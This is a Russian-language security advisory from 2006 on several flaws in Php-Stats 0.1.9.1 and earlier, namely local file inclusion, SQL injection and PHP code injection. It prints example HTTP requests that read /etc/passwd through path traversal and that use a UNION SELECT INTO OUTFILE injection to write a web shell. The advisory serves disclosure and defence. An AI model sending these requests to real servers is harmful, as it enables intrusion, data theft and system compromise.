Множественные уязвимости в Php-Stats

Дата публикации:
09.03.2006
Всего просмотров:
2051
Опасность:
Высокая
Наличие исправления:
Частично
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-1083
CVE-2006-1084
CVE-2006-1085
CVE-2006-1087
CVE-2006-1088
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
Раскрытие системных данных
Неавторизованное изменение данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Php-Stats 0.x
Уязвимые версии: Php-Stats 0.1.9.1 и более ранние версии.

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести SQL-инъекцию, получить доступ к важным данным и скомпрометировать уязвимую систему.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "option[language]" и "option[template]" в сценарии "admin.php". Удаленный пользователь может подключить произвольные файлы на локальной системе. Для успешной эксплуатации уязвимости опция "magic_quotes_gpc" должна быть выключена. Пример:

POST [path]admin.php?do=0 HTTP/1.1\r\n";
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close
option=&option[clear_cache]=1&option[language]=../../../../../../etc/passwd%00

POST [path]admin.php?do=0 HTTP/1.1\r\n"; Content-Type: application/x-www-form-urlencoded Host: [somehost] Content-Length: [data_length] Connection: Close option=&option[template]=../../../../../../etc/passwd%00
2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "option[prefix]" сценария "admin.php" и HTTP заголовке "PC_REMOTE_ADDR" в сценарии "click.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

GET [path]click.php?id=1&get=1 HTTP/1.1
PC_REMOTE_ADDR: 'UNION SELECT '[code]'INTO OUTFILE 'shell.php' FROM php_stats_cache/*
Host: [host]
Connection: Close
3. Уязвимость существует из-за недостаточной проверки входных данных в сценарии "admin.php". Удаленный пользователь может внедрить произвольный PHP код в сценарий "config.php".

4. Удаленный пользователь может получить данные об используемом префиксе в названии таблиц, запросив сценарий "checktables.php".

URL производителя: www.phpstats.net

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: PHP-Stats <= 0.1.9.1 remote commands execution

или введите имя

CAPTCHA